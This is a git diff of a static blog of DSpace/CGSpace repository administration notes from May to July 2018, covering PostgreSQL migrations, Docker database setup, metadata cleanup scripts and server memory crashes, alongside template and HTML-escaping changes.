@ -439,7 +439,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<ul>
<li>I&rsquo;m investigating how many non-CGIAR users we have registered on CGSpace:</li>
</ul>
<pre><code>dspace=# select email, netid from eperson where email not like '%cgiar.org%' and email like '%@%';
<pre tabindex="0"><code>dspace=# select email, netid from eperson where email not like &#39;%cgiar.org%&#39; and email like &#39;%@%&#39;;
</code></pre><ul>
<li>We might need to do something regarding these users for GDPR compliance because we have their names, emails, and potentially phone numbers</li>
<li>I decided that I will just use the cookieconsent script as is, since it looks good and technically does set the cookie with &ldquo;allow&rdquo; or &ldquo;dismiss&rdquo;</li>
@ -460,7 +460,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<li>DSpace Test crashed last night, seems to be related to system memory (not JVM heap)</li>
<li>I see this in <code>dmesg</code>:</li>
</ul>
<pre><code>[Wed May 30 00:00:39 2018] Out of memory: Kill process 6082 (java) score 697 or sacrifice child
<pre tabindex="0"><code>[Wed May 30 00:00:39 2018] Out of memory: Kill process 6082 (java) score 697 or sacrifice child
[Wed May 30 00:00:39 2018] Killed process 6082 (java) total-vm:14876264kB, anon-rss:5683372kB, file-rss:0kB, shmem-rss:0kB
[Wed May 30 00:00:40 2018] oom_reaper: reaped process 6082 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
@ -471,8 +471,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<li>I generated a list of CIFOR duplicates from the <code>CIFOR_May_9</code> collection using the Atmire MQM module and then dumped the HTML source so I could process it for sending to Vika</li>
<li>I used grep to filter all relevant handle lines from the HTML source then used sed to insert a newline before each &ldquo;Item1&rdquo; line (as the duplicates are grouped like Item1, Item2, Item3 for each set of duplicates):</li>
</ul>
<pre><code>$ grep -E 'aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item' ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html &gt; ~/cifor-duplicates.txt
$ sed 's/.*Item1.*/\n&amp;/g' ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cleaned.txt
<pre tabindex="0"><code>$ grep -E &#39;aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item&#39; ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html &gt; ~/cifor-duplicates.txt
$ sed &#39;s/.*Item1.*/\n&amp;/g&#39; ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cleaned.txt
</code></pre><ul>
<li>I told Vika to look through the list manually and indicate which ones are indeed duplicates that we should delete, and which ones to map to CIFOR&rsquo;s collection</li>
<li>A few weeks ago Peter wanted a list of authors from the ILRI collections, so I need to find a way to get the handles of all those collections</li>
@ -482,24 +482,24 @@ $ sed 's/.*Item1.*/\n&amp;/g' ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cle
<li>Oh shit, I literally already wrote a script to get all collections in a community hierarchy from the REST API: <a href="https://gist.github.com/alanorth/ddd7f555f0e487fe0e9d3eb4ff26ce50">rest-find-collections.py</a></li>
<li>The output isn&rsquo;t great, but all the handles and IDs are printed in debug mode:</li>
</ul>
<pre><code>$ ./rest-find-collections.py -u https://cgspace.cgiar.org/rest -d 10568/1 2&gt; /tmp/ilri-collections.txt
<pre tabindex="0"><code>$ ./rest-find-collections.py -u https://cgspace.cgiar.org/rest -d 10568/1 2&gt; /tmp/ilri-collections.txt
</code></pre><ul>
<li>Then I format the list of handles and put it into this SQL query to export authors from items ONLY in those collections (too many to list here):</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/67236','10568/67274',...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/67236&#39;,&#39;10568/67274&#39;,...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
</code></pre><h2 id="2018-05-31">2018-05-31</h2>
<ul>
<li>Clarify CGSpace&rsquo;s usage of Google Analytics and personally identifiable information during user registration for the Bioversity team, who had been asking about GDPR compliance</li>
<li>Testing running PostgreSQL in a Docker container on localhost because when I&rsquo;m on Arch Linux there isn&rsquo;t an easily installable package for particular PostgreSQL versions</li>
<li>Now I can just use Docker:</li>
</ul>
<pre><code>$ docker pull postgres:9.5-alpine
<pre tabindex="0"><code>$ docker pull postgres:9.5-alpine
$ docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.5-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -O -U dspacetest -d dspacetest -W -h localhost ~/Downloads/cgspace_2018-05-30.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest
</code></pre>
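<ul>
<li>When I&rsquo;m done testing I can (at least in theory) just throw the container away and start fresh next time, something like:</li>
</ul>
<pre tabindex="0"><code>$ docker stop dspacedb
$ docker rm dspacedb
</code></pre>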
@ -523,15 +523,15 @@ $ psql -h localhost -U postgres dspacetest
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -58,7 +58,7 @@ real 74m42.646s
user 8m5.056s
sys 2m7.289s
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -88,12 +88,12 @@ sys 2m7.289s
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -139,7 +139,7 @@ sys 2m7.289s
<p class="blog-post-meta">
<time datetime="2018-06-04T19:49:54-07:00">Mon Jun 04, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -154,12 +154,12 @@ sys 2m7.289s
<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
</code></pre><ul>
<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
<li>Time to index ~70,000 items on CGSpace:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 74m42.646s
user 8m5.056s
@ -181,7 +181,7 @@ sys 2m7.289s
<li>Institut National des Recherches Agricoles du B nin</li>
<li>Centre de Coop ration Internationale en Recherche Agronomique pour le D veloppement</li>
<li>Institut des Recherches Agricoles du B nin</li>
<li>Institut des Savannes, C te d' Ivoire</li>
<li>Institut des Savannes, C te d&rsquo; Ivoire</li>
<li>Institut f r Pflanzenpathologie und Pflanzenschutz der Universit t, Germany</li>
<li>Projet de Gestion des Ressources Naturelles, B nin</li>
<li>Universit t Hannover</li>
@ -193,19 +193,19 @@ sys 2m7.289s
<li>I uploaded fixes for all those now, but I will continue with the rest of the data later</li>
<li>Regarding the SQL migration errors, Atmire told me I need to run some migrations manually in PostgreSQL:</li>
</ul>
<pre><code>delete from schema_version where version = '5.6.2015.12.03.2';
update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015.12.03.3';
<pre tabindex="0"><code>delete from schema_version where version = &#39;5.6.2015.12.03.2&#39;;
update schema_version set version = &#39;5.6.2015.12.03.2&#39; where version = &#39;5.5.2015.12.03.2&#39;;
update schema_version set version = &#39;5.8.2015.12.03.3&#39; where version = &#39;5.5.2015.12.03.3&#39;;
</code></pre><ul>
<li>And then I need to ignore the ignored ones:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace database migrate ignored
<pre tabindex="0"><code>$ ~/dspace/bin/dspace database migrate ignored
</code></pre><ul>
<li>Now DSpace starts up properly!</li>
<li>Gabriela from CIP got back to me about the author names we were correcting on CGSpace</li>
<li>I did a quick sanity check on them and then did a test import with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-values.py</code></a> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
</code></pre><ul>
<li>I will apply them on CGSpace tomorrow I think&hellip;</li>
</ul>
@ -220,8 +220,8 @@ update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015
<li>I spent some time removing the Atmire Metadata Quality Module (MQM) from the proposed DSpace 5.8 changes</li>
<li>After removing all code mentioning MQM, mqm, metadata-quality, batchedit, duplicatechecker, etc, I think I got most of it removed, but there is a Spring error during Tomcat startup:</li>
</ul>
<pre><code> INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0' defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name 'itemCollectionPlugin' defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
<pre tabindex="0"><code> INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0&#39; defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name &#39;itemCollectionPlugin&#39; defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
</code></pre><ul>
<li>I can fix this by commenting out the <code>ItemCollectionPlugin</code> line of <code>discovery.xml</code>, but from looking at the git log I&rsquo;m not actually sure if that is related to MQM or not</li>
<li>I will have to ask Atmire</li>
@ -335,12 +335,12 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
</ul>
</li>
</ul>
<pre><code>or(
value.contains('€'),
value.contains('6g'),
value.contains('6m'),
value.contains('6d'),
value.contains('6e')
<pre tabindex="0"><code>or(
value.contains(&#39;€&#39;),
value.contains(&#39;6g&#39;),
value.contains(&#39;6m&#39;),
value.contains(&#39;6d&#39;),
value.contains(&#39;6e&#39;)
)
</code></pre><ul>
<li>So IITA should double check the abstracts for these:
@ -357,24 +357,24 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Robin Buruchara&rsquo;s items</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The contents of <code>2018-06-13-Robin-Buruchara.csv</code> were:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Buruchara, Robin&quot;,Robin Buruchara: 0000-0003-0934-1218
&quot;Buruchara, Robin A.&quot;,Robin Buruchara: 0000-0003-0934-1218
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Buruchara, Robin&#34;,Robin Buruchara: 0000-0003-0934-1218
&#34;Buruchara, Robin A.&#34;,Robin Buruchara: 0000-0003-0934-1218
</code></pre><ul>
<li>On a hunch I checked to see if CGSpace&rsquo;s bitstream cleanup was working properly and of course it&rsquo;s broken:</li>
</ul>
<pre><code>$ dspace cleanup -v
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(152402) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(152402) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>As always, the solution is to delete that ID manually in PostgreSQL:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);&#39;
UPDATE 1
</code></pre><h2 id="2018-06-14">2018-06-14</h2>
<ul>
@ -387,11 +387,11 @@ UPDATE 1
<ul>
<li>I was restoring a PostgreSQL dump on my test machine and found a way to restore the CGSpace dump as the <code>postgres</code> user, but have the owner of the schema be the <code>dspacetest</code> user:</li>
</ul>
<pre><code>$ dropdb -h localhost -U postgres dspacetest
<pre tabindex="0"><code>$ dropdb -h localhost -U postgres dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost /tmp/cgspace_2018-06-24.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><ul>
<li>The <code>-O</code> option to <code>pg_restore</code> makes the import process ignore ownership specified in the dump itself, and instead makes the schema owned by the user doing the restore</li>
<li>I always prefer to use the <code>postgres</code> user locally because it&rsquo;s just easier than remembering the <code>dspacetest</code> user&rsquo;s password, but then I couldn&rsquo;t figure out why the resulting schema was owned by <code>postgres</code></li>
@ -407,44 +407,44 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
<li>There is already a search filter for this field defined in <code>discovery.xml</code> but we aren&rsquo;t using it, so I quickly enabled and tested it, then merged it to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/380">#380</a>)</li>
<li>Back to testing the DSpace 5.8 changes from Atmire, I had another issue with SQL migrations:</li>
</ul>
<pre><code>Caused by: org.flywaydb.core.api.FlywayException: Validate failed. Found differences between applied migrations and available migrations: Detected applied migration missing on the classpath: 5.8.2015.12.03.3
<pre tabindex="0"><code>Caused by: org.flywaydb.core.api.FlywayException: Validate failed. Found differences between applied migrations and available migrations: Detected applied migration missing on the classpath: 5.8.2015.12.03.3
</code></pre><ul>
<li>It took me a while to figure out that this migration is for MQM, which I removed after Atmire&rsquo;s original advice about the migrations, so we actually need to delete this migration instead of updating it</li>
<li>So I need to make sure to run the following during the DSpace 5.8 upgrade:</li>
</ul>
<pre><code>-- Delete existing CUA 4 migration if it exists
delete from schema_version where version = '5.6.2015.12.03.2';
<pre tabindex="0"><code>-- Delete existing CUA 4 migration if it exists
delete from schema_version where version = &#39;5.6.2015.12.03.2&#39;;
-- Update version of CUA 4 migration
update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
update schema_version set version = &#39;5.6.2015.12.03.2&#39; where version = &#39;5.5.2015.12.03.2&#39;;
-- Delete MQM migration since we're no longer using it
delete from schema_version where version = '5.5.2015.12.03.3';
-- Delete MQM migration since we&#39;re no longer using it
delete from schema_version where version = &#39;5.5.2015.12.03.3&#39;;
</code></pre><ul>
<li>After that you can run the migrations manually and then DSpace should work fine:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace database migrate ignored
<pre tabindex="0"><code>$ ~/dspace/bin/dspace database migrate ignored
...
Done.
</code></pre><ul>
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis' items on CGSpace</li>
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis&rsquo; items on CGSpace</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p &#39;fuuu&#39;
</code></pre><ul>
<li>The contents of <code>2018-06-24-andy-jarvis-orcid.csv</code> were:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Jarvis, A.&quot;,Andy Jarvis: 0000-0001-6543-0798
&quot;Jarvis, Andy&quot;,Andy Jarvis: 0000-0001-6543-0798
&quot;Jarvis, Andrew&quot;,Andy Jarvis: 0000-0001-6543-0798
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Jarvis, A.&#34;,Andy Jarvis: 0000-0001-6543-0798
&#34;Jarvis, Andy&#34;,Andy Jarvis: 0000-0001-6543-0798
&#34;Jarvis, Andrew&#34;,Andy Jarvis: 0000-0001-6543-0798
</code></pre><h2 id="2018-06-26">2018-06-26</h2>
<ul>
<li>Atmire got back to me to say that we can remove the <code>itemCollectionPlugin</code> and <code>HasBitstreamsSSIPlugin</code> beans from DSpace&rsquo;s <code>discovery.xml</code> file, as they are used by the Metadata Quality Module (MQM) that we are not using anymore</li>
<li>I removed both those beans and did some simple tests to check item submission, media-filter of PDFs, REST API, but got an error &ldquo;No matches for the query&rdquo; when listing records in OAI</li>
<li>This warning appears in the DSpace log:</li>
</ul>
<pre><code>2018-06-26 16:58:12,052 WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
<pre tabindex="0"><code>2018-06-26 16:58:12,052 WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
</code></pre><ul>
<li>It&rsquo;s actually only a warning and it also appears in the logs on DSpace Test (which is currently running DSpace 5.5), so I need to keep troubleshooting</li>
<li>Ah, I think I just need to run <code>dspace oai import</code></li>
@ -455,27 +455,27 @@ Done.
<li>I&rsquo;ll have to figure out how to separate those we&rsquo;re keeping, deleting, and mapping into CIFOR&rsquo;s archive collection</li>
<li>First, get the 62 deletes from Vika&rsquo;s file and remove them from the collection:</li>
</ul>
<pre><code>$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' &gt; cifor-handle-to-delete.txt
<pre tabindex="0"><code>$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-delete.txt
$ wc -l cifor-handle-to-delete.txt
62 cifor-handle-to-delete.txt
$ wc -l 10568-92904.csv
2461 10568-92904.csv
$ while read line; do sed -i &quot;\#$line#d&quot; 10568-92904.csv; done &lt; cifor-handle-to-delete.txt
$ while read line; do sed -i &#34;\#$line#d&#34; 10568-92904.csv; done &lt; cifor-handle-to-delete.txt
$ wc -l 10568-92904.csv
2399 10568-92904.csv
</code></pre><ul>
<li>This iterates over the handles for deletion and uses <code>sed</code> with an alternative pattern delimiter of &lsquo;#&rsquo; (which must be escaped), because the pattern itself contains a &lsquo;/&rsquo;</li>
<li>The mapped ones will be difficult because we need their internal IDs in order to map them, and there are 50 of them:</li>
</ul>
<pre><code>$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' &gt; cifor-handle-to-map.txt
<pre tabindex="0"><code>$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-map.txt
$ wc -l cifor-handle-to-map.txt
50 cifor-handle-to-map.txt
</code></pre><ul>
<li>I can either get them from the database, or programmatically export the metadata using <code>dspace metadata-export -i 10568/xxxxx</code>&hellip;</li>
<li>Oooh, I can export the items one by one, concatenate them together, remove the headers, and extract the <code>id</code> and <code>collection</code> columns using <a href="https://csvkit.readthedocs.io/">csvkit</a>:</li>
</ul>
<pre><code>$ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done &lt; /tmp/cifor-handle-to-map.txt
$ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
<pre tabindex="0"><code>$ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done &lt; /tmp/cifor-handle-to-map.txt
$ sed &#39;/^id/d&#39; 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
</code></pre><ul>
<li>Then I can use OpenRefine to add the &ldquo;CIFOR Archive&rdquo; collection to the mappings</li>
<li>Importing the 2398 items via <code>dspace metadata-import</code> ends up with a Java garbage collection error, so I think I need to do it in batches of 1,000</li>
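<li>Something like this should work (untested sketch, the batch file names are just placeholders) to split the CSV into chunks of 1,000 rows while keeping the header on each:</li>
</ul>
<pre tabindex="0"><code>$ head -n 1 10568-92904.csv &gt; cifor-header.csv
$ tail -n +2 10568-92904.csv | split -l 1000 - cifor-batch-
$ for f in cifor-batch-*; do cat cifor-header.csv &#34;$f&#34; &gt; &#34;$f.csv&#34;; done
</code></pre>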
@ -487,7 +487,7 @@ $ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
<li>DSpace Test appears to have crashed last night</li>
<li>There is nothing in the Tomcat or DSpace logs, but I see the following in <code>dmesg -T</code>:</li>
</ul>
<pre><code>[Thu Jun 28 00:00:30 2018] Out of memory: Kill process 14501 (java) score 701 or sacrifice child
<pre tabindex="0"><code>[Thu Jun 28 00:00:30 2018] Out of memory: Kill process 14501 (java) score 701 or sacrifice child
[Thu Jun 28 00:00:30 2018] Killed process 14501 (java) total-vm:14926704kB, anon-rss:5693608kB, file-rss:0kB, shmem-rss:0kB
[Thu Jun 28 00:00:30 2018] oom_reaper: reaped process 14501 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
@ -517,15 +517,15 @@ $ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -36,7 +36,7 @@ During the mvn package stage on the 5.8 branch I kept getting issues with java r
There is insufficient memory for the Java Runtime Environment to continue.
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ There is insufficient memory for the Java Runtime Environment to continue.
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -117,7 +117,7 @@ There is insufficient memory for the Java Runtime Environment to continue.
<p class="blog-post-meta">
<time datetime="2018-07-01T12:56:54+03:00">Sun Jul 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -126,20 +126,20 @@ There is insufficient memory for the Java Runtime Environment to continue.
<ul>
<li>I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:</li>
</ul>
<pre><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
</code></pre><ul>
<li>During the <code>mvn package</code> stage on the 5.8 branch I kept getting issues with java running out of memory:</li>
</ul>
<pre><code>There is insufficient memory for the Java Runtime Environment to continue.
<pre tabindex="0"><code>There is insufficient memory for the Java Runtime Environment to continue.
</code></pre><ul>
